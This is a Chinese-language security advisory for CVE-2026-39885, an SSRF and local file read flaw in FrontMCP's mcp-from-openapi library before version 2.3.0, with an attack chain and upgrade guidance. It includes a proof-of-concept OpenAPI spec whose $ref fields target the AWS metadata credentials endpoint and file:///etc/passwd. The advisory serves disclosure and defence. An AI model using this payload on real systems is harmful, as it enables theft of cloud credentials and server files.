CVE-2026-39885 CVSS 7.5 高危

CVE-2026-39885 FrontMCP SSRF及本地文件读取漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39885

漏洞类型

SSRF, 本地文件读取

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FrontMCP

漏洞概述

FrontMCP框架集成的mcp-from-openapi库在2.3.0版本之前存在严重安全漏洞。该组件在解析OpenAPI规范时未对$ref指针设置URL访问限制，导致在处理恶意输入时，攻击者可利用此缺陷发起服务端请求伪造（SSRF）及本地文件读取攻击，进而访问内部网络资源或服务器敏感数据。

技术细节

该漏洞的核心在于FrontMCP框架使用的mcp-from-openapi库在解析OpenAPI规范时，依赖了@apidevtools/json-schema-ref-parser组件进行$ref指针解引用。在2.3.0之前的版本中，库未对解析器的目标URL设置任何白名单或限制机制。当应用程序调用initialize()函数处理不受信任的OpenAPI规范文件时，攻击者可注入包含内网IP地址（如127.0.0.1）、云元数据端点（如169.254.169.254）或本地文件路径（如file:///etc/passwd）的$ref字段。这将导致解析器主动向这些目标发送HTTP请求或读取文件内容，从而实现服务端请求伪造（SSRF）和本地文件读取（LFI），严重威胁服务器安全。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标正在使用FrontMCP框架且版本低于2.3.0。

STEP 2

武器化

攻击者构造恶意的OpenAPI规范文件，其中包含指向内网敏感地址（如127.0.0.1）、云元数据服务或本地文件路径的$ref指针。

STEP 3

交付

攻击者将构造好的恶意OpenAPI文件上传或提交给目标应用程序进行处理。

STEP 4

利用

目标应用调用库的initialize()方法，解析器自动解引用$ref指针，向攻击者指定的内部地址发起请求或读取本地文件。

STEP 5

影响

攻击者成功获取内网服务信息、云凭证或服务器上的敏感文件内容，导致数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC: Malicious OpenAPI specification to trigger SSRF or Local File Read
// Save this as a JSON file and feed it to the vulnerable FrontMCP instance.

const maliciousOpenApiSpec = {
  "openapi": "3.0.0",
  "info": {
    "title": "Exploit PoC",
    "version": "1.0.0"
  },
  "paths": {
    "/vulnerable": {
      "get": {
        "summary": "SSRF via $ref",
        "description": {
          // Attempting to read AWS Instance Metadata
          "$ref": "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
        }
      }
    },
    "/local-file": {
      "get": {
        "summary": "LFI via $ref",
        "description": {
          // Attempting to read a local file (depending on OS/file permissions)
          "$ref": "file:///etc/passwd"
        }
      }
    }
  }
};

// Usage example: Pass this object to the initialize() function of the vulnerable library.

影响范围

FrontMCP < 2.3.0

mcp-from-openapi < 2.3.0

防御指南

临时缓解措施

建议立即升级FrontMCP至2.3.0或更高版本以修复此漏洞。若无法立即升级，请实施严格的网络分段策略，阻断服务器对内网及公网元数据端点的出站连接，并在应用层面对上传的OpenAPI文档进行深度检查，剔除包含外部引用的内容。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表